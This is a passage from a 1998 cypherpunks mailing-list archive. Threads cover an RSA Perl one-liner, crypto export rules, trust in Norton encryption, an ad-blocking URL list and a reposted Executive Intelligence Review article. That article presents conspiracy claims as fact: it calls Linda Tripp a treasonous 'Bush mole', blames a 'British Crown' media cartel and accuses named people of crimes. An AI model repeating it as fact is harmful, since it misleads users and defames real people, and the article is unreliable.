it says ...$_=echo "16... and it should say ...$_=`echo "16...

I pointed this out to Richard White when he sent me the gif of his
tattoo, and he had his wife put in the backtick, as there is a
reasonable amount of space between the = and e of echo.

If anyone wants to repeat the exercise, the perl/dc program is smaller
now:

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Wed, 28 Jan 1998 23:40:45 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: State of the Union Address
In-Reply-To: <Pine.BSF.3.91.980127113443.14544C-100000@mcfeely.bsfs.org>
Message-ID: <34CF78E9.5F29@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Rabid Wombat wrote:
> 
> On Tue, 27 Jan 1998, Paul H. Merrill wrote:
> 
> > Rabid Wombat wrote:
> > >
> > > On Sat, 24 Jan 1998, Matthew Ghio wrote:
> > >
> > > > Anonymous wrote:
> > > >
> > > > > [1] Grab a totally random sample of 100 high school students. Haul the
> > > > >     students out one at a time and ask them the following questions:
> > > > [snip]
> > > > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > > > >     circumstances, what is produced and in what quantities?
> > > > >
> > > >
> > > > The correct answer is an explosion and a big mess.  One student in my high
> > > > school chemistry class learned this the hard way.  :)
> > > >
> > > >
> > >
> > > Um, salt water explodes?
> >
> > I guess those high school students aren't the only ones with no clear
> > idea of the way the world works.  While salt water does not ordinarily
> > explode, in this case salt water is the ultimate product -- but massive
> > heat released when acids and bases join and recombine to produce salts
> > (in this case table salt) and water.
> >
> > while some do feel (especially on this list) that the ends justify the
> > means -- this is one means that definitely does not go along with that
> > "rule".
> >
> > PHM.
> >
> 
> Actually the qustion is probably hosed, as the ratio should be 1:1
> Hcl:NaOH mol, not weight (which would be about 10:9 Hcl:NaOH or so if I'm
> not confused here) ...  the idea being that if you calculate and measure
> just right, you can mix too highly dangerous chemicals and will get
> saltwater which you can drink. If you don't measure just right, and drink
> it, you are rightly fucked, so don't try this at home.
> 
> Can't find exact delta-h listed for NaOH, but rough guess on this reaction
> is maybe 150,000 - 175,000 joules, or about half a box of kitchen matches
> worth of heat (~150-175 btu ?), which wouldn't boil a quart of water. I
> suppose if you had a small enough solution you could get a small "bang"
> out of vaporizing the water. Not exactly a terrorist threat.
> 
> A moderate amount of heat, but without increasing the number of
> molecules, where's the explosion? Am I missing something? Looks like warm
> saltwater to me. OTOH, I don't know anything about chemistry 'cuz I
> always got kicked outa class for doing dumber things than mixing Hcl and
> NaOH and drinking it, which is the usual stunt. Don't try this at home,
> and don't take chemistry advice from marsupials.
> 
> btw - didn't really "do the math" on this, and it's 2am, so it could be
> wildly innacurate.
> 
> -r.w.

yes, the quantities are small, thus total heat is small, but so is the
mass to be heated (who cares idf it will boils a quart when we are
talking about a couple of grams).  Explosion is perhaps a poor choice of
words, but I would not like to be in the spatter zone of it either.

PHM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 28 Jan 1998 19:18:39 +0800
To: tcmay@got.net
Subject: how to ensure 128 bit netscape is used world wide (Re: Exporting Code the Easy Way)
In-Reply-To: <v03102809b0f4820cf059@[207.167.93.63]>
Message-ID: <199801281029.KAA00449@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:
> At 9:44 PM -0800 1/27/98, Alan Olsen wrote:
> >At 07:26 PM 1/26/98 -0800, Tom Weinstein wrote:
> >
> >>Don't hold your breath.  We're still bound by US export regulations, so
> >>we won't be able to export crypto-relevant source code.  We'll release what
> >>we can, but you probably won't be satisfied.
> >>
> >>Of course, there's always the option for some enterprising individuals
> >>outside the US to replace the missing pieces.
> >
> >Or you could just publish the source code in a big book...  ]:>
> 
> Or even easier option:
> 
> Dispense with the actual scanning and OCRing and simply _say_ the code was
> OCRed. Or, for that matter, don't even bother to say. U.S. Customs and the
> ITARs/EARs have no provisions for asking international users if the version
> they are using was compiled from source code printed in books!
> 
> Why do things the hard way?

Agree strongly.

The problem is not in the export, which as Tim says happens soon
enough anyway, as anyone can verify looking at www.replay.com where a
good collection of 128 bit browsers can be obtained.

The problem is netscape's distribution license.  I tried to work out
why netscape is only carried at certain sites, and why all of the
sites which do carry it carry 40 bit.  The answer seems to be that
even though the netscape browser is free for academic use, that
netscape tries to control distribution by requiring distributing sites
to sign their distribution license.

Netscape's motive for this restrictive distribution license I presume
is an attempt to reduce risk of hacked copies (say with virususes
embedded) being distributed.  By keeping the number of sites
controlled (albeit by weak legal mechanism) they keep the sites to a
small number of large reputable ftp sites.

This leads to the conclusion that the best thing netscape could do is:

- not distribute a 40 bit version in electronic form at all, forcing
  overseas sites to keep 128 bit versions

- have shrink wrap 40 bit versions sold overseas if they must, but
  have strict license prohibiting electronic distribution

- modify the distribution license to allow free distribution of the
  128 bit version (none of this distributors must sign a license)

- ensure that the license on the purchased 40 bit version allows one
  to use the freely obtained 128 bit version in a commercial setting

Problem solved.  No need to fiddle around with printing source code in
books, or to waste time remove crypto calls and hooks from source
code, nor waste some one elses time recoding the omitted code.

So, how about it netscape?

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 28 Jan 1998 17:53:28 +0800
To: Robert Hettinga <cypherpunks@cyberpass.net
Subject: Re: ULotD? Cuban Tattoos.
In-Reply-To: <v03102804b0f44f13f6ad@[207.167.93.63]>
Message-ID: <3.0.5.32.19980128133041.0088ec40@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:21 PM 1/27/98 -0500, Robert Hettinga wrote:
>At 9:58 pm -0500 on 1/27/98, Tim May wrote:
>> Utter bullshit.
>Agreed. On several levels of reference, I think...

Well of course it was!  But a well-crafted urban legend,
with enough truth and enough deliberate bogosity to be worthwhile.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 28 Jan 1998 17:53:43 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356 (fwd)
In-Reply-To: <199801280418.WAA04044@einstein.ssz.com>
Message-ID: <3.0.5.32.19980128133959.0088d310@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> Speaking of which, do the current SETI programs check for signal
>> modulation using polarization.

Speaking of SETI, their current intent is to do a distributed
computation spread across thousands of computers, similar to some of the
keycracking efforts.  Details at http://www.bigscience.com ;
the Recent News section says they're currently trying to figure
out about funding.  Meanwhile, there's www.mersenne.org for
factoring big prime numbers.

Tim wrote:
> Nothing in quantum teleportation has been shown to propagate 
> signals faster than light. (If you don't believe me, look into it.
> Start by reading the FTL discussions about Bell's Theorem.)
But I thought Jim Bell had a solution to .....  :-)

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Wed, 28 Jan 1998 13:12:10 +0800
To: "'David Honig'" <whgiii@invweb.net>
Subject: RE: FW: Symantec Norton, Your Eyes Only.
Message-ID: <01ISWZV6P6C200AYSF@hmgwy1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hi guys,

If I could get access to the source,
understand all of it fully, and understand
how it will act under Win95 with whatever
compiler they used, I could probably write
my own.

So I guess it comes down to trust.

Thanks for the replies.

Bye for now.

> -----Original Message-----
> From:	David Honig [SMTP:honig@otc.net]
> Sent:	Saturday, January 24, 1998 5:08 AM
> To:	Pearson Shane; 'William H. Geiger III'
> Cc:	'cypherpunks@toad.com'
> Subject:	RE: FW: Symantec Norton, Your Eyes Only.
> 
> At 03:46 PM 1/23/98 +1100, Pearson Shane wrote:
> >Hi William,
> >
> >Many thanks for the reply.
> >
> >I was hoping it was ok having Blowfish,
> >but I guess it could be their own
> >"efficient" version.
> >
> >Bye for now.
> >
> 
> WHGIII gave you the most conservative answer.  That is, in cryptology,
> the
> correct answer.
> 
> A more detailed analysis would say:
> 
> * the blowfish algorithm is considered strong for various reasons
> 
> * IFF the Norton program were written correctly
> (not just the algorithm implementation, but key hiding,
> worrying about getting swapped onto disk by the OS, etc.)
> then it would be a useful tool for security.
> 
> * Without examining the source, any assumption of security
> from using the tool relies *absolutely* on your trust of the
> implementor.
> 
> (In a Turing award paper, Ritchie described how you
> implicitly must trust your compiler-writers too.. the 
> compiler could have clandestine functions like inserting
> extra code when it recognizes patterns)
> 
> So you see how WHGIII was correct, although for practical
> purposes (depending on the value of your data and the 
> attackers you anticipate, plus the security of the rest of your
> system (only as strong as the weakest link)) you may find this tool
> acceptable
> in the non-exportable version.  Keylength-limited versions are
> worthless
> from a security viewpoint.
> 
> But on this mailing list, you won't find the yes/no answer
> you probably want.  Which is probably correct behavior for this list.
> 
> Cheers,
> 
> 
> ------------------------------------------------------------
>       David Honig                   Orbit Technology
>      honig@otc.net                  Intaanetto Jigyoubu
> 
> "The tragedy of Galois is that he could have contributed so much
> more to mathematics if he'd only spent more time on his marksmanship."
> 
> 
> 
> 	
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Wed, 28 Jan 1998 13:58:09 +0800
To: "'cypherpunks@toad.com
Subject: RE: More dumb ad sites for your killfile
Message-ID: <01ISX1DJ3ZQA00C0LU@hmgwy1.isd.tafensw.edu.au>
MIME-Version: 1.0
Content-Type: text/plain



Hi all,

Can I have a killfile for Outlook 97
or am I limited to the Inbox assistant?

Thanks,

> -----Original Message-----
> From:	dlv@bwalk.dm.com [SMTP:dlv@bwalk.dm.com]
> Sent:	Monday, January 26, 1998 5:50 PM
> To:	cypherpunks@toad.com
> Subject:	Re: More dumb ad sites for your killfile
> 
> nobody@REPLAY.COM (Anonymous) writes:
> > ads.lycos.com
> > ad.doubleclick.net
> > ads.altavista.digital.com
> > ad.preferences.com
> > ph-ad*.focalink.com
> > www.news.com/Banners
> > ads.lycos.com
> > static.wired.com/advertising
> 
> A desirable feature for a proxy would be to filter portions of what it
> gets.
> If we're getting a URL that matches a pattern (like
> www.stocks.hotshit.com),
> then once we see a certain pattern in the HTML (start of embedded ad),
> excise the HTML until we see another pattern.  A set of triples.
> 
> My block file so far is much bigger than yours.  Anyone cares to keep
> the
> official big blocklist? :-)
> 
> **********************************************************************
> ****
> victory.cnn.com/(image|click).ng/
> /fox/graphics/yuppie.gif
> ads.web.aol.com
> /*/rsac.jpg
> /gifs/ads/
> webtrack.com
> # look for guesttrack
> /.*/rsacirated.gif
> /shell-cgi/adserv/ads
> /adserver/
> /ad-graphics/
> /cgi-win/tracker
> /cgi-bin/Count
> /cgi-bin/guesttrack
> webcrawler.com/icons/(tenants.*|bottom_logo).gif
> netads.*.com/
> mckinley.com/img/magellan/butnbar.gif
> #hotbot.com
> hotbot.com/images/list.*.gif
> #
> banner-net.com/
> /cgi-bin/nph-count
> # yahoo
> /us.yimg.com/images/compliance/
> # Internet explorer logos
> /.*/ie.*_(animated|static|sm).gif
> /.*/netnow.*.gif
> pagecount.com
> gm.preferences.com
> # da Silva's stupid list of mailing lists
> /internet/paml/sponsors
> /gifs/mlogo3.gif
> #dejanews
> /gifs/tripod.gif
> /gifs/browsers.gif
> /gifs/dnlogo_r.*.gif
> # domains
> smartclicks.com/
> resource-marketing.com/
> valueclick.com/
> bannermall.com/
> iname.com/
> bannerweb.com/
> eads.com/
> /interdex/reciprocal/
> /cgi-bin/spim/sp/
> adforce..*.com/
> /cgi-bin/adclick
> imageserv.imgis.com/images/
> /g/ads/
> #
> /graphics/ads/
> /OAS/ugo/adstream.cgi/
> /content/cgi-bin/clickad/
> /content/advertising/
> /.*/(S|s)ponsors/.*.gif
> /cgi-bin/pn/show_ad
> /gif/ads/
> .*banner.*.gif
> /ad/
> /adgenius/
> /adproof/
> /(A|a)ds/
> /adv/
> /advertising/
> /adverts/
> /avimages/
> /banner_ds/
> /banners/
> /banners?/
> /CategoryID=0
> /cgi-bin/ad-bin/
> /cgi-bin/adroll/
> /cgi-bin/counter*
> /cgi-bin/nph-adlick
> /event.ng/
> /gfx/spon/
> /gifs/netfinity.gif
> /gifs/tripod2.gif
> /graphics/pcast.gif
> /graphicsadvert
> /image/ads/
> /images/ABCnewsa.gif
> /images/ads/
> /images/deckad1.gif
> /images/getpoint1.gif
> /images/nyyahoo.gif
> /images/partners/
> /images/promo/
> /img/ads/
> /img/art4/home/promo/
> /inserts/images/
> /ml/gfx/spon/
> /pictures/sponsors/
> /promobar
> /promos/
> /promotions/
> /RealMedia/ads/
> /shared/images/marketing/
> /sponsor.*/.*.gif
> 209.25.19.47/
> :23
> ad.*.com/
> adserve.*.com/
> ad.*.net/
> adcount.hollywood.com/
> ads*.focalink.com/
> ads.*.com/
> bannersolutions.com/
> bannerswap.com/
> counter.digits.com/
> digits.com/
> doubleclick.com/
> flycast.com/
> freestats.com/
> globaltrack.com/
> globaltrack.net/
> gp.dejanews.com/
> guide.infoseek.com/
> infoseek.com/images/channel/
> hitbox.com/
> hollynxxx.com/
> icount.com/
> jcount.com/
> linkexchange.com/
> register-it.com
> riddler.com/
> sexhound.com/
> sexlist.com/
> stattrax.com/
> style.rahul.net/altavista/adverts/
> # Geocities
> www.geocities.com/cgi-bin/homestead/GeoGuideLite_image*
> geocities.com/MemberBanners
> xpagecount.com/
> xxxcounter.com/
> **********************************************************************
> ****
> More stuff that I need to sort out:
> 
> adsmart.net
> doubleclick.net
> SmartBanner
> imageserv.imgis.com/images
> images.yahoo.com/adv
> /ad_client.cgi
> 
> # ms sucks !
> /*.*/(ms)?backoff(ice)?.*.(gif|jpe?g)
> /*.*/(msie|sqlbans|powrbybo|activex|backoffice|explorer|netnow|getpoin
> t|ntbutton|hmlink).*.(gif|jpe?g)
> /*.*/activex.*(gif|jpe?g)
> /*.*/explorer?.(gif|jpe?g)
> /*.*/freeie.(gif|jpe?g)
> /*.*/ie_?(buttonlogo|static?|anim.*)?.(gif|jpe?g)
> /*.*/ie_sm.(gif|jpe?g)
> /*.*/msie(30)?.(gif|jpe?g)
> /*.*/msnlogo.(gif|jpe?g)
> /*.*/office97_ad1.(gif|jpe?g)
> /*.*/pbbobansm.(gif|jpe?g)
> /*.*/powrbybo.(gif|jpe?g)
> /*.*/sqlbans.(gif|jpe?g)
> 
> # generally useless information and promo stuff (commented out)
> #/*.*/(counter|getpcbutton|BuiltByNOF|netscape|hotmail|vcr(rated)?|rsa
> ci(rated)?|freeloader|cache_now(_anim)?|apache_pb|now_(anim_)?button|i
> e_?(buttonlogo|static?|.*ani.*)?).(gif|jpe?g)
> 
> #------------------------
> #
> # specific servers
> #
> #------------------------
> 193.158.37.3/cgi-bin/impact
> 193.210.156.114
> 194.231.79.38
> 199.78.52.10
> 204.253.46.71:1977
> 204.94.67.40/wc/
> 205.216.163.62
> 205.217.103.58:1977
> 205.217.103.58:1977
> 206.50.219.33
> 207.159.135.72
> 207.82.250.9
> 209.1.135.144:1971
> 209.1.135.142:1971
> ad-up.com
> ads?.*\.(com|net)
> ad.adsmart.net
> ad.doubleclick.net
> ad.infoseek.com
> ad.linkexchange.com
> ad.preferences.com
> adbot.com
> adbot.theonion.com
> adcount.hollywood.com
> adforce.imgis.com
> adlink.deh.de
> adone.com
> ads*.focalink.com
> ads*.zdnet.com
> ads.csi.emcweb.com
> ads.imagine-inc.com
> ads.imdb.com
> ads.infospace.com
> ads.lycos.com
> ads.narrowline.com
> ads.realmedia.com
> ads.softbank.net/bin/wadredir
> ads.usatoday.com
> ads.washingtonpost.com
> ads.web.aol.com
> ads.web21.com
> adservant.mediapoint.de
> banners.internetextra.com
> bannerswap.com
> bs.gsanet.com/gsa_bs/
> ciec.org/images/countdown.gif
> click1.wisewire.com
> click2.wisewire.com
> clickii.imagine-inc.com:1964
> commonwealth.riddler.com
> customad.cnn.com
> cyberfirst1.web.cerf.net/image.ng/
> digits.com/wc/
> dino.mainz.ibm.de
> flycast.com/
> globaltrack.com
> globaltrak.net
> gm.preferences.com/image.ng
> gtp.dejanews.com/gtplacer
> hardware.pagecount.com/
> hitbox.com/wc/
> hyperbanner.net
> icount.com/.*.count
> images.yahoo.com/promotions/
> imageserv.imgis.com
> impartner.de/cgi-bin
> linktrader.com/cgi-bin/
> logiclink.nl/cgi-bin/
> movielink.com/media/imagelinks/MF.(ad|sponsor)
> nrsite.com
> nt1.imagine-inc.com
> nt2.imagine-inc.com
> nytsyn.com/gifs
> pagecount.com/aa-cgi-bin
> pagecount.com/aa-cgi-bin
> ph-ad*.focalink.com
> promo.ads.softbank.net
> resource-marketing.com/tb/
> smartclicks.com/.*/smartimg
> smh.com.au/adproof/
> sysdoc.pair.com/cgi-sys/cgiwrap/sysdoc/sponsor.gif
> victory.cnn.com/image.ng/spacedesc
> videoserver.kpix.com
> w20.hitbox.com
> www..bigyellow.com/......mat.*
> www.ads.warnerbros.com
> www.fxweb.holowww.com/.*.cgi
> www.iadventure.com/adserver/
> www.infoworld.com/pageone/gif
> www.isys.net/customer/images
> www.javaworld.com/javaworld/jw-ad
> www.link4link.com/cgi-bin
> www.mediashower.com/ad-bin/
> www.nedstat.nl/cgi-bin/
> www.nj.com/adverts
> www.nrsite.com
> www.pagecount.com/aa-cgi-bin
> www.search.com/Banners
> www.smartclicks.com:81
> www.swwwap.com/cgi-bin/
> www.valueclick.com/cgi-bin/
> www.websitepromote.com/partner/img/
> www.wishing.com/webaudit
> yahoo.com/CategoryID=0
> 
> #------------------------
> #
> # some images on servers that I frequently visit
> #
> #------------------------
> 
> # some images on cnn's website just suck!
> /*.*/book.search.gif
> /*.*/cnnpostopinionhome..gif
> /*.*/custom_feature.gif
> /*.*/explore.anim.*gif
> /*.*/infoseek.gif
> /*.*/pathnet.warner.gif
> /BarnesandNoble/images/bn.recommend.box.*
> /digitaljam/images/digital_ban.gif
> /hotstories/companies/images/companies_banner.gif
> /markets/images/markets_banner.gif
> /ows-img/bnoble.gif
> /ows-img/nb_Infoseek.gif
> cnnfn.com/images/left_banner.gif
> 
> # die sueddeutsche
> /*.*/images/artszonnet.jpg
> 
> # yahoo.de
> /promotions/bankgiro/
> 
> #
> /gif/buttons/banner_.*
> /gif/buttons/cd_shop_.*
> /gif/cd_shop/cd_shop_ani_.*
> 
> #altavista
> /av/gifs/av_map.gif
> /av/gifs/av_logo.gif
> 
> /*.*/banner_ads/
> /*.*/banners?/
> /*.*/images/addver.gif
> /*.*/place-ads
> /*.*/promobar.*
> /*.*/publicite/
> /*.*/reklame/
> /*.*/sponsor.gif
> /*.*/sponsors?[0-9]?/
> /*.*/werb\..*
> /ad_images/
> /bin/nph-oma.count/ct/default.shtml
> /bin/nph-oma.count/ix/default.html
> /cgi-bin/nph-load
> /netscapeworld/nw-ad/
> /worldnet/ad.cgi
> /rotads/
> /rotateads/
> /rotations/
> /promotions/houseads/
> **********************************************************************
> ****
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013,
> 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)covici@ccs.covici.com
Date: Mon, 2 Feb 1998 13:05:03 +0800
To: cypherpunks@toad.com
Subject: Re: Bush Gang Suspected In Assault On PresidencyBush Gang Suspected In Assault On Presidency
In-Reply-To: <34cae887.ccs@ccs.covici.com>
Message-ID: <Jk99Je17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Bush gang suspected in new assault on Presidency

by Edward Spannaus and Jeffrey Steinberg

In the midst of the worst global financial crisis in modern history, the
United States Presidency has come under renewed, vicious attack from a
combination of British and nominally ``American'' Bush-League circles.
This latest attack, which one White House official long ago
appropriately dubbed ``bimbo eruptions,'' centered around a Bush
``mole'' who was, unfortunately, allowed to operate inside the Clinton
administration, and who now enjoys high-level security clearances in her
post at the Pentagon.

Linda Tripp, the central player in the renewed assault against President
Clinton--staged around a purported sex scandal involving a young White
House intern, Monica Lewinsky--was a Bush administration employee from
1990, until Bush left office in January 1993. At the urging of senior
Bush administration officials, including Transportation Secretary Sam
Skinner, Tripp was retained by the Clinton-Gore transition team in a
clerical position, and later assigned to work at the Office of the White
House General Counsel, under Bernard Nussbaum and his deputy, Vincent
Foster. All the while, she was operating as part of a treasonous
Bush-League ``fifth column'' within the Executive branch.

While the ``Get Clinton'' media have attempted to portray Tripp as
``apolitical,'' she was, in fact, an ally, from the Bush administration
period on, of then-FBI agent Gary Aldrich, who, in 1996, wrote a
libellous book against President Clinton, {Unlimited Access: An FBI
Agent Inside the Clinton White House,} which also revolved around bogus
claims of White House sexual misconduct (see {EIR,} July 26, 1996,
p.|72.) Aldrich was another Bush-League mole inside the Clinton White
House. His embarrassingly fantasy-ridden book has been trumpetted by the
London-based Hollinger Corporation, the leading British Crown media
cartel; by its subsidiary, {American Spectator} magazine; and by ``Get
Clinton'' money-bags Richard Mellon Scaife.

Tripp emerged in 1995 as an asset of Whitewater Independent Counsel
Kenneth Starr, testifying before the Whitewater grand jury and later
before a Congressional hearing on the death of Vincent Foster. When
Lloyd Cutler replaced Nussbaum as White House General Counsel, Tripp,
who by then had been widely identified as an unabashed political enemy
of President Clinton, was reassigned to the Pentagon, where she
eventually got an $80,000-a-year job, which also involved her getting
top-level security clearances. Tripp claimed, to anyone who would
listen, that she had been transferred from the White House because she
``knew too much about Whitewater,'' a patent lie.

Commenting on the role of Tripp as the linchpin in the latest
Clintongate assault, Lyndon LaRouche called on Jan. 22 for Tripp's
security clearances to be immediately revoked, pending the outcome of a
thorough probe of her role in the sordid affair. ``She obviously needs
her security clearances immediately pulled, given her role in what has
all the earmarks of an illegal attack against the President, ostensibly
on behalf of partisan Republican forces. I would certainly hope that
there is no one in the Pentagon who would countenance such an obvious
assault against a vital American institution, the Presidency. I would
expect such treachery from the editorial page writers at the {Wall
Street Journal,} but not from our military.''


               - An earlier `eruption' -


In the summer of 1997, Tripp surfaced again as part of an effort to hit
President Clinton with a ``Profumo''-style sex scandal, telling
{Newsweek} that the President had sexually harassed a White House aide,
Kathleen Willey. Willey denied, under oath, that Tripp's allegations
were true. This prompted President Clinton's attorney, Robert Bennett,
belatedly, in August 1997, to denounce Tripp as a liar.

While working at the Pentagon, in late 1996, Tripp had already begun to
cultivate a close relationship with a former White House junior staff
aide, 22-year-old Monica Lewinsky, who had been recently transferred to
the Defense Department. It is unclear how the two women came to meet,
but in short order, Tripp began to exert a significant amount of control
over the younger woman. Tripp should be forced, under oath, to detail
the circumstance under which she met and befriended Lewinsky.

Tripp soon betrayed Lewinsky's confidence by surreptitiously--and,
probably, illegally--taping telephone conversations with Lewinsky.

By December 1997, Tripp and Lewinsky had {both,} mysteriously, been
subpoenaed to give depositions to attorneys for Paula Jones, in her
civil lawsuit against the President--a lawsuit instigated by British
intelligence operator and former London {Sunday Telegraph} Washington
correspondent Ambrose Evans-Pritchard. How Jones's attorneys came to
know of the existence of Tripp and Lewinsky is one question that may
hold a key to Tripp's role in the present attack against the President.
It should be recalled that, prior to being named the independent counsel
in Whitewater, Kenneth Starr had been paid by Richard Mellon Scaife,
through the Landmark Legal Foundation, to prepare an {amicus curiae}
brief in support of Paula Jones.

Tripp claims that, on Jan. 12, 1998, she took 20 hours of tape-recorded
conversations with Lewinsky to Whitewater Special Prosecutor Starr. The
next day, Starr arranged for Tripp to secretly tape her meeting with
Lewinsky at the Ritz Carlton Hotel near the Pentagon in Arlington,
Virginia.

At the time that Starr arranged for the FBI to secretly tape the
Tripp-Lewinsky meeting, {he had absolutely no jurisdiction to probe
President Clinton's relationship to the former White House aide.}
Indeed, it is critical that a full-scale probe be conducted, to
determine whether Tripp, who was in league with Starr from 1995, was
taping her conversations with Lewinsky on her own, or, covertly, on
behalf of Starr. At minimum, Starr vastly overstepped his jurisdiction;
far more likely, he himself broke the law--along with Tripp--in a
flagrant attempt to entrap and destroy President Clinton.


                 - No U.S. precedent -


In the 200-year history of the American Presidency, there have been
occasional sexual scandals involving top government officials; however,
never has such a personal scandal brought down the chief executive.
There is only one country in the world where heads of government are
brought to their knees through such tabloid scandal-mongering: Great
Britain. In 1963, Harold Macmillan's government was brought down by a
sex scandal involving Defense Minister John Profumo.

It is, therefore, not surprising that a review of the various
Clintongate scandals, from the 1993 so-called ``Troopergate'' affair to
the present attack, reveals that British intelligence stringer and
former {Sunday Telegraph} Washington correspondent Ambrose
Evans-Pritchard has been the chief instigator. As early as May 8, 1994,
in a {Sunday Telegraph} column, Evans-Pritchard boasted that he had been
instrumental in getting Paula Jones to file her civil suit against the
President.

Evans-Pritchard has elsewhere boasted that his assignment, on behalf of
the British Crown's Hollinger Corporation, has been nothing less than
the total destruction of the Clinton Presidency. Writing in the Jan. 22
{Daily Telegraph,} Evans-Pritchard loudly bragged of his manipulation of
Paula Jones: ``My impression after befriending her four years ago,
before she took the momentous step of suing the President, is that her
motive was sheer rage.''

``Paula Jones has now achieved her object of inflicting massive damage
on Bill Clinton, with shortening odds that she may ultimately destroy
his Presidency,'' he continued. Evans-Pritchard accuses the U.S. news
media of covering up the Clinton sex scandals, so that only the
{American Spectator} or the British press will print the stories. ``What
Paula Jones has done is to use the immense power of legal discovery to
force the scandal to the surface. She has finally done the job that the
American media failed to do so miserably.''

This was precisely the strategy that Evans-Pritchard had laid out in
1994, when he acknowledged on May 8, 1994, that he had had ``a dozen
conversations with Mrs. Jones over the past two months.'' He furthermore
admitted that ``I happened to be present at a strategy meeting last
month on a boat on the Arkansas River,'' at which Jones's attorney ``was
weighing the pros and cons of legal action.''

It doesn't ``matter all that much whether Mrs. Jones ultimately wins or
loses her case,'' he wrote on May 15, 1994. ``The ticking time bomb in
the lawsuit lies elsewhere, in the testimony of other witnesses.''

``Put plainly,'' Evans-Pritchard blurted, ``the political purpose of the
Jones lawsuit is to reconstruct the inner history of the Arkansas
Governor's Mansion, using the legal power of discovery. In effect, the
two lawyers and their staff could soon be doing the job that the
American media failed to do during the election campaign and have
largely failed to do since.''

Evans-Pritchard's motive, in contrast to Jones's ``sheer rage,'' is a
deep, abiding hatred of the United States, and particularly, the
institution of its Presidency. Anyone who joins Evans-Pritchard in this
unfolding assault upon the Presidency, is joining the ranks of traitor
Aaron Burr.

A thorough probe of the current insurrection, beginning with a spotlight
on Linda Tripp, is more than appropriate.

>From Executive Intelligence Review V25, #5.
-- 
         John Covici
          covici@ccs.covici.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 29 Jan 1998 00:26:42 +0800
To: "Roger J Jones" <cyber@ibpinc.com>
Subject: Re: Tim May as censor??????????
In-Reply-To: <199801281519.JAA04493@pc1824.ibpinc.com>
Message-ID: <199801281640.LAA25623@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



In <199801281519.JAA04493@pc1824.ibpinc.com>, on 01/28/98 
   at 09:22 AM, "Roger J Jones" <cyber@ibpinc.com> said:


>>Jeez, this is not "ChemPunks."

>>Calculating exothermic and endothermic yields (measured in "kcal/mole") for
>>various chemistry reactions was a central part of my sophomore chemistry
>>class in high school 30 years ago.

>>I suggest the question askers consult any of the most basic chemistry
>>textbooks.

>>--Tim May

>Tim,
>Can this be? Censorship from the man on the mountain? So unlike you......

Please, 

There is nothing wrong requesting a poster put forth the bare minimum of
research before wasting the time of list members with trivial questions.

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: How do you make Windows faster?  Throw it harder!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 29 Jan 1998 00:25:16 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Exporting Code the Easy Way
In-Reply-To: <v03102809b0f4820cf059@[207.167.93.63]>
Message-ID: <199801281636.LAA25477@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



In <v03102809b0f4820cf059@[207.167.93.63]>, on 01/28/98 
   at 01:46 AM, Tim May <tcmay@got.net> said:

>At 9:44 PM -0800 1/27/98, Alan Olsen wrote:
>>At 07:26 PM 1/26/98 -0800, Tom Weinstein wrote:
>>
>>>Don't hold your breath.  We're still bound by US export regulations, so
>>>we won't be able to export crypto-relevant source code.  We'll release what
>>>we can, but you probably won't be satisfied.
>>>
>>>Of course, there's always the option for some enterprising individuals
